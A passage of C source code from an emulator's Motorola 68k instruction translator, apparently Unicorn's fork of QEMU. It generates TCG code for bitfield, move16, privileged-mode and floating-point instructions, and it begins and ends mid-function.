read_im16(env, s); TCGv src = DREG(insn, 0); int len = ((extract32(ext, 0, 5) - 1) & 31) + 1; int ofs = extract32(ext, 6, 5); /* big bit-endian */ TCGv mask, tofs, tlen; tofs = NULL; tlen = NULL; if ((insn & 0x0f00) == 0x0d00) { /* bfffo */ tofs = tcg_temp_new(tcg_ctx); tlen = tcg_temp_new(tcg_ctx); } if ((ext & 0x820) == 0) { /* Immediate width and offset. */ uint32_t maski = 0x7fffffffu >> (len - 1); if (ofs + len <= 32) { tcg_gen_shli_i32(tcg_ctx, QREG_CC_N, src, ofs); } else { tcg_gen_rotli_i32(tcg_ctx, QREG_CC_N, src, ofs); } tcg_gen_andi_i32(tcg_ctx, QREG_CC_N, QREG_CC_N, ~maski); mask = tcg_const_i32(tcg_ctx, ror32(maski, ofs)); if (tofs) { tcg_gen_movi_i32(tcg_ctx, tofs, ofs); tcg_gen_movi_i32(tcg_ctx, tlen, len); } } else { TCGv tmp = tcg_temp_new(tcg_ctx); if (ext & 0x20) { /* Variable width */ tcg_gen_subi_i32(tcg_ctx, tmp, DREG(ext, 0), 1); tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 31); mask = tcg_const_i32(tcg_ctx, 0x7fffffffu); tcg_gen_shr_i32(tcg_ctx, mask, mask, tmp); if (tlen) { tcg_gen_addi_i32(tcg_ctx, tlen, tmp, 1); } } else { /* Immediate width */ mask = tcg_const_i32(tcg_ctx, 0x7fffffffu >> (len - 1)); if (tlen) { tcg_gen_movi_i32(tcg_ctx, tlen, len); } } if (ext & 0x800) { /* Variable offset */ tcg_gen_andi_i32(tcg_ctx, tmp, DREG(ext, 6), 31); tcg_gen_rotl_i32(tcg_ctx, QREG_CC_N, src, tmp); tcg_gen_andc_i32(tcg_ctx, QREG_CC_N, QREG_CC_N, mask); tcg_gen_rotr_i32(tcg_ctx, mask, mask, tmp); if (tofs) { tcg_gen_mov_i32(tcg_ctx, tofs, tmp); } } else { /* Immediate offset (and variable width) */ tcg_gen_rotli_i32(tcg_ctx, QREG_CC_N, src, ofs); tcg_gen_andc_i32(tcg_ctx, QREG_CC_N, QREG_CC_N, mask); tcg_gen_rotri_i32(tcg_ctx, mask, mask, ofs); if (tofs) { tcg_gen_movi_i32(tcg_ctx, tofs, ofs); } } tcg_temp_free(tcg_ctx, tmp); } set_cc_op(s, CC_OP_LOGIC); switch (insn & 0x0f00) { case 0x0a00: /* bfchg */ tcg_gen_eqv_i32(tcg_ctx, src, src, mask); break; case 0x0c00: /* bfclr */ tcg_gen_and_i32(tcg_ctx, src, src, mask); break; case 0x0d00: /* bfffo */ gen_helper_bfffo_reg(tcg_ctx, DREG(ext, 12), QREG_CC_N, tofs, tlen); tcg_temp_free(tcg_ctx, tlen); tcg_temp_free(tcg_ctx, tofs); break; case 0x0e00: /* bfset */ tcg_gen_orc_i32(tcg_ctx, src, src, mask); break; case 0x0800: /* bftst */ /* flags already set; no other work to do. */ break; default: g_assert_not_reached(); } tcg_temp_free(tcg_ctx, mask); } DISAS_INSN(bfop_mem) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int ext = read_im16(env, s); TCGv addr, len, ofs; TCGv_i64 t64; addr = gen_lea(env, s, insn, OS_UNSIZED); if (IS_NULL_QREG(addr)) { gen_addr_fault(s); return; } if (ext & 0x20) { len = DREG(ext, 0); } else { len = tcg_const_i32(tcg_ctx, extract32(ext, 0, 5)); } if (ext & 0x800) { ofs = DREG(ext, 6); } else { ofs = tcg_const_i32(tcg_ctx, extract32(ext, 6, 5)); } switch (insn & 0x0f00) { case 0x0a00: /* bfchg */ gen_helper_bfchg_mem(tcg_ctx, QREG_CC_N, tcg_ctx->cpu_env, addr, ofs, len); break; case 0x0c00: /* bfclr */ gen_helper_bfclr_mem(tcg_ctx, QREG_CC_N, tcg_ctx->cpu_env, addr, ofs, len); break; case 0x0d00: /* bfffo */ t64 = tcg_temp_new_i64(tcg_ctx); gen_helper_bfffo_mem(tcg_ctx, t64, tcg_ctx->cpu_env, addr, ofs, len); tcg_gen_extr_i64_i32(tcg_ctx, DREG(ext, 12), QREG_CC_N, t64); tcg_temp_free_i64(tcg_ctx, t64); break; case 0x0e00: /* bfset */ gen_helper_bfset_mem(tcg_ctx, QREG_CC_N, tcg_ctx->cpu_env, addr, ofs, len); break; case 0x0800: /* bftst */ gen_helper_bfexts_mem(tcg_ctx, QREG_CC_N, tcg_ctx->cpu_env, addr, ofs, len); break; default: g_assert_not_reached(); } set_cc_op(s, CC_OP_LOGIC); if (!(ext & 0x20)) { tcg_temp_free(tcg_ctx, len); } if (!(ext & 0x800)) { tcg_temp_free(tcg_ctx, ofs); } } DISAS_INSN(bfins_reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int ext = read_im16(env, s); TCGv dst = DREG(insn, 0); TCGv src = DREG(ext, 12); int len = ((extract32(ext, 0, 5) - 1) & 31) + 1; int ofs = extract32(ext, 6, 5); /* big bit-endian */ int pos = 32 - ofs - len; /* little bit-endian */ TCGv tmp; tmp = tcg_temp_new(tcg_ctx); if (ext & 0x20) { /* Variable width */ tcg_gen_neg_i32(tcg_ctx, tmp, DREG(ext, 0)); tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 31); tcg_gen_shl_i32(tcg_ctx, QREG_CC_N, src, tmp); } else { /* Immediate width */ tcg_gen_shli_i32(tcg_ctx, QREG_CC_N, src, 32 - len); } set_cc_op(s, CC_OP_LOGIC); /* Immediate width and offset */ if ((ext & 0x820) == 0) { /* Check for suitability for deposit. */ if (pos >= 0) { tcg_gen_deposit_i32(tcg_ctx, dst, dst, src, pos, len); } else { #ifdef _MSC_VER uint32_t maski = 0xfffffffeU << (len - 1); #else uint32_t maski = -2U << (len - 1); #endif uint32_t roti = (ofs + len) & 31; tcg_gen_andi_i32(tcg_ctx, tmp, src, ~maski); tcg_gen_rotri_i32(tcg_ctx, tmp, tmp, roti); tcg_gen_andi_i32(tcg_ctx, dst, dst, ror32(maski, roti)); tcg_gen_or_i32(tcg_ctx, dst, dst, tmp); } } else { TCGv mask = tcg_temp_new(tcg_ctx); TCGv rot = tcg_temp_new(tcg_ctx); if (ext & 0x20) { /* Variable width */ tcg_gen_subi_i32(tcg_ctx, rot, DREG(ext, 0), 1); tcg_gen_andi_i32(tcg_ctx, rot, rot, 31); tcg_gen_movi_i32(tcg_ctx, mask, -2); tcg_gen_shl_i32(tcg_ctx, mask, mask, rot); tcg_gen_mov_i32(tcg_ctx, rot, DREG(ext, 0)); tcg_gen_andc_i32(tcg_ctx, tmp, src, mask); } else { /* Immediate width (variable offset) */ #ifdef _MSC_VER uint32_t maski = 0xfffffffeU << (len - 1); #else uint32_t maski = -2U << (len - 1); #endif tcg_gen_andi_i32(tcg_ctx, tmp, src, ~maski); tcg_gen_movi_i32(tcg_ctx, mask, maski); tcg_gen_movi_i32(tcg_ctx, rot, len & 31); } if (ext & 0x800) { /* Variable offset */ tcg_gen_add_i32(tcg_ctx, rot, rot, DREG(ext, 6)); } else { /* Immediate offset (variable width) */ tcg_gen_addi_i32(tcg_ctx, rot, rot, ofs); } tcg_gen_andi_i32(tcg_ctx, rot, rot, 31); tcg_gen_rotr_i32(tcg_ctx, mask, mask, rot); tcg_gen_rotr_i32(tcg_ctx, tmp, tmp, rot); tcg_gen_and_i32(tcg_ctx, dst, dst, mask); tcg_gen_or_i32(tcg_ctx, dst, dst, tmp); tcg_temp_free(tcg_ctx, rot); tcg_temp_free(tcg_ctx, mask); } tcg_temp_free(tcg_ctx, tmp); } DISAS_INSN(bfins_mem) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int ext = read_im16(env, s); TCGv src = DREG(ext, 12); TCGv addr, len, ofs; addr = gen_lea(env, s, insn, OS_UNSIZED); if (IS_NULL_QREG(addr)) { gen_addr_fault(s); return; } if (ext & 0x20) { len = DREG(ext, 0); } else { len = tcg_const_i32(tcg_ctx, extract32(ext, 0, 5)); } if (ext & 0x800) { ofs = DREG(ext, 6); } else { ofs = tcg_const_i32(tcg_ctx, extract32(ext, 6, 5)); } gen_helper_bfins_mem(tcg_ctx, QREG_CC_N, tcg_ctx->cpu_env, addr, src, ofs, len); set_cc_op(s, CC_OP_LOGIC); if (!(ext & 0x20)) { tcg_temp_free(tcg_ctx, len); } if (!(ext & 0x800)) { tcg_temp_free(tcg_ctx, ofs); } } DISAS_INSN(ff1) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg; reg = DREG(insn, 0); gen_logic_cc(s, reg, OS_LONG); gen_helper_ff1(tcg_ctx, reg, reg); } DISAS_INSN(chk) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src, reg; int opsize; switch ((insn >> 7) & 3) { case 3: opsize = OS_WORD; break; case 2: if (m68k_feature(env, M68K_FEATURE_CHK2)) { opsize = OS_LONG; break; } /* fallthru */ default: gen_exception(s, s->base.pc_next, EXCP_ILLEGAL); return; } SRC_EA(env, src, opsize, 1, NULL); reg = gen_extend(s, DREG(insn, 9), opsize, 1); gen_flush_flags(s); gen_helper_chk(tcg_ctx, tcg_ctx->cpu_env, reg, src); } DISAS_INSN(chk2) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint16_t ext; TCGv addr1, addr2, bound1, bound2, reg; int opsize; switch ((insn >> 9) & 3) { case 0: opsize = OS_BYTE; break; case 1: opsize = OS_WORD; break; case 2: opsize = OS_LONG; break; default: gen_exception(s, s->base.pc_next, EXCP_ILLEGAL); return; } ext = read_im16(env, s); if ((ext & 0x0800) == 0) { gen_exception(s, s->base.pc_next, EXCP_ILLEGAL); return; } addr1 = gen_lea(env, s, insn, OS_UNSIZED); addr2 = tcg_temp_new(tcg_ctx); tcg_gen_addi_i32(tcg_ctx, addr2, addr1, opsize_bytes(opsize)); bound1 = gen_load(s, opsize, addr1, 1, IS_USER(s)); tcg_temp_free(tcg_ctx, addr1); bound2 = gen_load(s, opsize, addr2, 1, IS_USER(s)); tcg_temp_free(tcg_ctx, addr2); reg = tcg_temp_new(tcg_ctx); if (ext & 0x8000) { tcg_gen_mov_i32(tcg_ctx, reg, AREG(ext, 12)); } else { gen_ext(tcg_ctx, reg, DREG(ext, 12), opsize, 1); } gen_flush_flags(s); gen_helper_chk2(tcg_ctx, tcg_ctx->cpu_env, reg, bound1, bound2); tcg_temp_free(tcg_ctx, reg); tcg_temp_free(tcg_ctx, bound1); tcg_temp_free(tcg_ctx, bound2); } static void m68k_copy_line(TCGContext *tcg_ctx, TCGv dst, TCGv src, int index) { TCGv addr; TCGv_i64 t0, t1; addr = tcg_temp_new(tcg_ctx); t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, addr, src, ~15); tcg_gen_qemu_ld64(tcg_ctx, t0, addr, index); tcg_gen_addi_i32(tcg_ctx, addr, addr, 8); tcg_gen_qemu_ld64(tcg_ctx, t1, addr, index); tcg_gen_andi_i32(tcg_ctx, addr, dst, ~15); tcg_gen_qemu_st64(tcg_ctx, t0, addr, index); tcg_gen_addi_i32(tcg_ctx, addr, addr, 8); tcg_gen_qemu_st64(tcg_ctx, t1, addr, index); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free(tcg_ctx, addr); } DISAS_INSN(move16_reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int index = IS_USER(s); TCGv tmp; uint16_t ext; ext = read_im16(env, s); if ((ext & (1 << 15)) == 0) { gen_exception(s, s->base.pc_next, EXCP_ILLEGAL); } m68k_copy_line(tcg_ctx, AREG(ext, 12), AREG(insn, 0), index); /* Ax can be Ay, so save Ay before incrementing Ax */ tmp = tcg_temp_new(tcg_ctx); tcg_gen_mov_i32(tcg_ctx, tmp, AREG(ext, 12)); tcg_gen_addi_i32(tcg_ctx, AREG(insn, 0), AREG(insn, 0), 16); tcg_gen_addi_i32(tcg_ctx, AREG(ext, 12), tmp, 16); tcg_temp_free(tcg_ctx, tmp); } DISAS_INSN(move16_mem) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int index = IS_USER(s); TCGv reg, addr; reg = AREG(insn, 0); addr = tcg_const_i32(tcg_ctx, read_im32(env, s)); if ((insn >> 3) & 1) { /* MOVE16 (xxx).L, (Ay) */ m68k_copy_line(tcg_ctx, reg, addr, index); } else { /* MOVE16 (Ay), (xxx).L */ m68k_copy_line(tcg_ctx, addr, reg, index); } tcg_temp_free(tcg_ctx, addr); if (((insn >> 3) & 2) == 0) { /* (Ay)+ */ tcg_gen_addi_i32(tcg_ctx, reg, reg, 16); } } DISAS_INSN(strldsr) { uint16_t ext; uint32_t addr; addr = s->pc - 2; ext = read_im16(env, s); if (ext != 0x46FC) { gen_exception(s, addr, EXCP_ILLEGAL); return; } ext = read_im16(env, s); if (IS_USER(s) || (ext & SR_S) == 0) { gen_exception(s, addr, EXCP_PRIVILEGE); return; } gen_push(s, gen_get_sr(s)); gen_set_sr_im(s, ext, 0); } DISAS_INSN(move_from_sr) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv sr; if (IS_USER(s) && !m68k_feature(env, M68K_FEATURE_M68000)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } sr = gen_get_sr(s); DEST_EA(env, insn, OS_WORD, sr, NULL); } DISAS_INSN(moves) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int opsize; uint16_t ext; TCGv reg; TCGv addr; int extend; if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } ext = read_im16(env, s); opsize = insn_opsize(insn); if (ext & 0x8000) { /* address register */ reg = AREG(ext, 12); extend = 1; } else { /* data register */ reg = DREG(ext, 12); extend = 0; } addr = gen_lea(env, s, insn, opsize); if (IS_NULL_QREG(addr)) { gen_addr_fault(s); return; } if (ext & 0x0800) { /* from reg to ea */ gen_store(s, opsize, addr, reg, DFC_INDEX(s)); } else { /* from ea to reg */ TCGv tmp = gen_load(s, opsize, addr, 0, SFC_INDEX(s)); if (extend) { gen_ext(tcg_ctx, reg, tmp, opsize, 1); } else { gen_partset_reg(tcg_ctx, opsize, reg, tmp); } tcg_temp_free(tcg_ctx, tmp); } switch (extract32(insn, 3, 3)) { case 3: /* Indirect postincrement. */ tcg_gen_addi_i32(tcg_ctx, AREG(insn, 0), addr, REG(insn, 0) == 7 && opsize == OS_BYTE ? 2 : opsize_bytes(opsize)); break; case 4: /* Indirect predecrememnt. */ tcg_gen_mov_i32(tcg_ctx, AREG(insn, 0), addr); break; } } DISAS_INSN(move_to_sr) { if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } gen_move_to_sr(env, s, insn, false); gen_exit_tb(s); } DISAS_INSN(move_from_usp) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } tcg_gen_ld_i32(tcg_ctx, AREG(insn, 0), tcg_ctx->cpu_env, offsetof(CPUM68KState, sp[M68K_USP])); } DISAS_INSN(move_to_usp) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } tcg_gen_st_i32(tcg_ctx, AREG(insn, 0), tcg_ctx->cpu_env, offsetof(CPUM68KState, sp[M68K_USP])); } DISAS_INSN(halt) { if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } gen_exception(s, s->pc, EXCP_HALT_INSN); } DISAS_INSN(stop) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint16_t ext; if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } ext = read_im16(env, s); gen_set_sr_im(s, ext, 0); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_halted, 1); gen_exception(s, s->pc, EXCP_HLT); } DISAS_INSN(rte) { if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } gen_exception(s, s->base.pc_next, EXCP_RTE); } DISAS_INSN(cf_movec) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint16_t ext; TCGv reg; if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } ext = read_im16(env, s); if (ext & 0x8000) { reg = AREG(ext, 12); } else { reg = DREG(ext, 12); } gen_helper_cf_movec_to(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, ext & 0xfff), reg); gen_exit_tb(s); } DISAS_INSN(m68k_movec) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint16_t ext; TCGv reg; if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } ext = read_im16(env, s); if (ext & 0x8000) { reg = AREG(ext, 12); } else { reg = DREG(ext, 12); } if (insn & 1) { gen_helper_m68k_movec_to(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, ext & 0xfff), reg); } else { gen_helper_m68k_movec_from(tcg_ctx, reg, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, ext & 0xfff)); } gen_exit_tb(s); } DISAS_INSN(intouch) { if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } /* ICache fetch. Implement as no-op. */ } DISAS_INSN(cpushl) { if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } /* Cache push/invalidate. Implement as no-op. */ } DISAS_INSN(cpush) { if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } /* Cache push/invalidate. Implement as no-op. */ } DISAS_INSN(cinv) { if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } /* Invalidate cache line. Implement as no-op. */ } DISAS_INSN(pflush) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv opmode; if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } opmode = tcg_const_i32(tcg_ctx, (insn >> 3) & 3); gen_helper_pflush(tcg_ctx, tcg_ctx->cpu_env, AREG(insn, 0), opmode); tcg_temp_free(tcg_ctx, opmode); } DISAS_INSN(ptest) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv is_read; if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } is_read = tcg_const_i32(tcg_ctx, (insn >> 5) & 1); gen_helper_ptest(tcg_ctx, tcg_ctx->cpu_env, AREG(insn, 0), is_read); tcg_temp_free(tcg_ctx, is_read); } DISAS_INSN(wddata) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); } DISAS_INSN(wdebug) { if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } /* TODO: Implement wdebug. */ cpu_abort(env_cpu(env), "WDEBUG not implemented"); } DISAS_INSN(trap) { gen_exception(s, s->base.pc_next, EXCP_TRAP0 + (insn & 0xf)); } static void gen_load_fcr(DisasContext *s, TCGv res, int reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; switch (reg) { case M68K_FPIAR: tcg_gen_movi_i32(tcg_ctx, res, 0); break; case M68K_FPSR: tcg_gen_ld_i32(tcg_ctx, res, tcg_ctx->cpu_env, offsetof(CPUM68KState, fpsr)); break; case M68K_FPCR: tcg_gen_ld_i32(tcg_ctx, res, tcg_ctx->cpu_env, offsetof(CPUM68KState, fpcr)); break; } } static void gen_store_fcr(DisasContext *s, TCGv val, int reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; switch (reg) { case M68K_FPIAR: break; case M68K_FPSR: tcg_gen_st_i32(tcg_ctx, val, tcg_ctx->cpu_env, offsetof(CPUM68KState, fpsr)); break; case M68K_FPCR: gen_helper_set_fpcr(tcg_ctx, tcg_ctx->cpu_env, val); break; } } static void gen_qemu_store_fcr(DisasContext *s, TCGv addr, int reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int index = IS_USER(s); TCGv tmp; tmp = tcg_temp_new(tcg_ctx); gen_load_fcr(s, tmp, reg); tcg_gen_qemu_st32(tcg_ctx, tmp, addr, index); tcg_temp_free(tcg_ctx, tmp); } static void gen_qemu_load_fcr(DisasContext *s, TCGv addr, int reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int index = IS_USER(s); TCGv tmp; tmp = tcg_temp_new(tcg_ctx); tcg_gen_qemu_ld32u(tcg_ctx, tmp, addr, index); gen_store_fcr(s, tmp, reg); tcg_temp_free(tcg_ctx, tmp); } static void gen_op_fmove_fcr(CPUM68KState *env, DisasContext *s, uint32_t insn, uint32_t ext) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int mask = (ext >> 10) & 7; int is_write = (ext >> 13) & 1; int mode = extract32(insn, 3, 3); int i; TCGv addr, tmp; switch (mode) { case 0: /* Dn */ if (mask != M68K_FPIAR && mask != M68K_FPSR && mask != M68K_FPCR) { gen_exception(s, s->base.pc_next, EXCP_ILLEGAL); return; } if (is_write) { gen_load_fcr(s, DREG(insn, 0), mask); } else { gen_store_fcr(s, DREG(insn, 0), mask); } return; case 1: /* An, only with FPIAR */ if (mask != M68K_FPIAR) { gen_exception(s, s->base.pc_next, EXCP_ILLEGAL); return; } if (is_write) { gen_load_fcr(s, AREG(insn, 0), mask); } else { gen_store_fcr(s, AREG(insn, 0), mask); } return; default: break; } tmp = gen_lea(env, s, insn, OS_LONG); if (IS_NULL_QREG(tmp)) { gen_addr_fault(s); return; } addr = tcg_temp_new(tcg_ctx); tcg_gen_mov_i32(tcg_ctx, addr, tmp); /* * mask: * * 0b100 Floating-Point Control Register * 0b010 Floating-Point Status Register * 0b001 Floating-Point Instruction Address Register * */ if (is_write && mode == 4) { for (i = 2; i >= 0; i--, mask >>= 1) { if (mask & 1) { gen_qemu_store_fcr(s, addr, 1 << i); if (mask != 1) { tcg_gen_subi_i32(tcg_ctx, addr, addr, opsize_bytes(OS_LONG)); } } } tcg_gen_mov_i32(tcg_ctx, AREG(insn, 0), addr); } else { for (i = 0; i < 3; i++, mask >>= 1) { if (mask & 1) { if (is_write) { gen_qemu_store_fcr(s, addr, 1 << i); } else { gen_qemu_load_fcr(s, addr, 1 << i); } if (mask != 1 || mode == 3) { tcg_gen_addi_i32(tcg_ctx, addr, addr, opsize_bytes(OS_LONG)); } } } if (mode == 3) { tcg_gen_mov_i32(tcg_ctx, AREG(insn, 0), addr); } } tcg_temp_free_i32(tcg_ctx, addr); } static void gen_op_fmovem(CPUM68KState *env, DisasContext *s, uint32_t insn, uint32_t ext) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int opsize; TCGv addr, tmp; int mode = (ext >> 11) & 0x3; int is_load = ((ext & 0x2000) == 0); if (m68k_feature(s->env, M68K_FEATURE_FPU)) { opsize = OS_EXTENDED; } else { opsize = OS_DOUBLE; /* FIXME */ } addr = gen_lea(env, s, insn, opsize); if (IS_NULL_QREG(addr)) { gen_addr_fault(s); return; } tmp = tcg_temp_new(tcg_ctx); if (mode & 0x1) { /* Dynamic register list */ tcg_gen_ext8u_i32(tcg_ctx, tmp, DREG(ext, 4)); } else { /* Static register list */ tcg_gen_movi_i32(tcg_ctx, tmp, ext & 0xff); } if (!is_load && (mode & 2) == 0) { /* * predecrement addressing mode * only available to store register to memory */ if (opsize == OS_EXTENDED) { gen_helper_fmovemx_st_predec(tcg_ctx, tmp, tcg_ctx->cpu_env, addr, tmp); } else { gen_helper_fmovemd_st_predec(tcg_ctx, tmp, tcg_ctx->cpu_env, addr, tmp); } } else { /* postincrement addressing mode */ if (opsize == OS_EXTENDED) { if (is_load) { gen_helper_fmovemx_ld_postinc(tcg_ctx, tmp, tcg_ctx->cpu_env, addr, tmp); } else { gen_helper_fmovemx_st_postinc(tcg_ctx, tmp, tcg_ctx->cpu_env, addr, tmp); } } else { if (is_load) { gen_helper_fmovemd_ld_postinc(tcg_ctx, tmp, tcg_ctx->cpu_env, addr, tmp); } else { gen_helper_fmovemd_st_postinc(tcg_ctx, tmp, tcg_ctx->cpu_env, addr, tmp); } } } if ((insn & 070) == 030 || (insn & 070) == 040) { tcg_gen_mov_i32(tcg_ctx, AREG(insn, 0), tmp); } tcg_temp_free(tcg_ctx, tmp); } /* * ??? FP exceptions are not implemented. Most exceptions are deferred until * immediately before the next FP instruction is executed. */ DISAS_INSN(fpu) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint16_t ext; int opmode; int opsize; TCGv_ptr cpu_src, cpu_dest; ext = read_im16(env, s); opmode = ext & 0x7f; switch ((ext >> 13) & 7) { case 0: break; case 1: goto undef; case 2: if (insn == 0xf200 && (ext & 0xfc00) == 0x5c00) { /* fmovecr */ TCGv rom_offset = tcg_const_i32(tcg_ctx, opmode); cpu_dest = gen_fp_ptr(tcg_ctx, REG(ext, 7)); gen_helper_fconst(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, rom_offset); tcg_temp_free_ptr(tcg_ctx, cpu_dest); tcg_temp_free(tcg_ctx, rom_offset); return; } break; case 3: /* fmove out */ cpu_src = gen_fp_ptr(tcg_ctx, REG(ext, 7)); opsize = ext_opsize(ext, 10); if (gen_ea_fp(env, s, insn, opsize, cpu_src, EA_STORE, IS_USER(s)) == -1) { gen_addr_fault(s); } gen_helper_ftst(tcg_ctx, tcg_ctx->cpu_env, cpu_src); tcg_temp_free_ptr(tcg_ctx, cpu_src); return; case 4: /* fmove to control register. */ case 5: /* fmove from control register. */ gen_op_fmove_fcr(env, s, insn, ext); return; case 6: /* fmovem */ case 7: if ((ext & 0x1000) == 0 && !m68k_feature(s->env, M68K_FEATURE_FPU)) { goto undef; } gen_op_fmovem(env, s, insn, ext); return; } if (ext & (1 << 14)) { /* Source effective address. */ opsize = ext_opsize(ext, 10); cpu_src = gen_fp_result_ptr(tcg_ctx); if (gen_ea_fp(env, s, insn, opsize, cpu_src, EA_LOADS, IS_USER(s)) == -1) { gen_addr_fault(s); return; } } else { /* Source register. */ opsize = OS_EXTENDED; cpu_src = gen_fp_ptr(tcg_ctx, REG(ext, 10)); } cpu_dest = gen_fp_ptr(tcg_ctx, REG(ext, 7)); switch (opmode) { case 0: /* fmove */ gen_fp_move(tcg_ctx, cpu_dest, cpu_src); break; case 0x40: /* fsmove */ gen_helper_fsround(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x44: /* fdmove */ gen_helper_fdround(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 1: /* fint */ gen_helper_firound(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 2: /* fsinh */ gen_helper_fsinh(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 3: /* fintrz */ gen_helper_fitrunc(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 4: /* fsqrt */ gen_helper_fsqrt(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x41: /* fssqrt */ gen_helper_fssqrt(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x45: /* fdsqrt */ gen_helper_fdsqrt(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x06: /* flognp1 */ gen_helper_flognp1(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x09: /* ftanh */ gen_helper_ftanh(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x0a: /* fatan */ gen_helper_fatan(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x0c: /* fasin */ gen_helper_fasin(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x0d: /* fatanh */ gen_helper_fatanh(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x0e: /* fsin */ gen_helper_fsin(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x0f: /* ftan */ gen_helper_ftan(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x10: /* fetox */ gen_helper_fetox(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x11: /* ftwotox */ gen_helper_ftwotox(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x12: /* ftentox */ gen_helper_ftentox(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x14: /* flogn */ gen_helper_flogn(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x15: /* flog10 */ gen_helper_flog10(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x16: /* flog2 */ gen_helper_flog2(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x18: /* fabs */ gen_helper_fabs(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x58: /* fsabs */ gen_helper_fsabs(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x5c: /* fdabs */ gen_helper_fdabs(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x19: /* fcosh */ gen_helper_fcosh(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x1a: /* fneg */ gen_helper_fneg(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x5a: /* fsneg */ gen_helper_fsneg(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x5e: /* fdneg */ gen_helper_fdneg(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x1c: /* facos */ gen_helper_facos(tcg_ctx, 